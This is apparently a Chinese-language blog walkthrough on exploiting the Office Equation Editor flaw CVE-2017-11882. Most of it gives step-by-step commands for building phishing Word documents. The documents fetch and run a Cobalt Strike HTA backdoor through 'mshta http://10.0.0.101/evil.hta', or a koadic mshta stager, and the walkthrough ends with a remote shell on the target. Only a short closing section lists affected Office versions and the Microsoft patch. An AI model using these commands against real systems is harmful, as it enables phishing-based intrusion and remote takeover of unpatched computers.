最近这段时间CVE-2017-11882挺火的。关于这个漏洞详情分析可以查看:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)
今天在twitter上看到有人共享了一个POC,twitter地址,poc地址,后来又看到有人共享了一个项目CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,但是在执行命令限制在43字节内。
1.kali下执行生成一个新的doc:
root@backlion:/opt/CVE-2017-11882-master#git clone https://github.com/embedi/CVE-2017-11882.git
root@backlion:/opt# pythonwebdav_exec_CVE-2017-11882.py -u"cmd.exe" -e "cmd.exe" -o bk.doc
2.在目标测试机上打开,就会弹出计算器:
1.由于有长度的限制,我们需要对poc进行修改,可以使用Evi1cg 师傅改造的poc,其下载地址为:
https://raw.githubusercontent.com/Ridter/CVE-2017-11882/master/Command_CVE-2017-11882.py
2.通过cobaltstrike生成一个hta后门:
最终生成一个evil.hta后门文件。
2.使用SimpleHTTPServer搭建一个简单的http服务器,以提供hta后门文件下载执行。
root@backlion:~/桌面# python -m SimpleHTTPServer 80
3.通过poc生成一个钓鱼的doc文件:
root@backlion:/opt/CVE-2017-11882-master#python Command_CVE-2017-11882.py -c "mshtahttp://10.0.0.101/evil.hta" -otest.doc
4.将生成的test.doc拷贝到目标靶机上执行,最后CS下可以看到已获得目标shell:
1.下载并执行koadic
root@backlion:/opt# git clonehttps://github.com/backlion/koadic.git
root@backlion:/opt/koadic# ./koadic
2.分别设置监听地址和端口,并执行:
(koadic: stager/js/mshta)# set lhost10.0.0.101
(koadic: stager/js/mshta)# set lport 55555
(koadic: stager/js/mshta)# run
3.通过poc执行生成一个钓鱼doc文件:
root@backlion:/opt/CVE-2017-11882-master#python Command_CVE-2017-11882.py -c"mshta http://10.0.0.101:55555/8VWBT" -o test.doc
4.将doc拷贝到目标靶机上执行,最终会在koadic:获得目标靶机shell:
(koadic: stager/js/mshta)# zombies 0
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
微软已经对此漏洞做出了修复:
(1)下载
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补
(2)开启Windows Update功能,定期对系统进行自动更新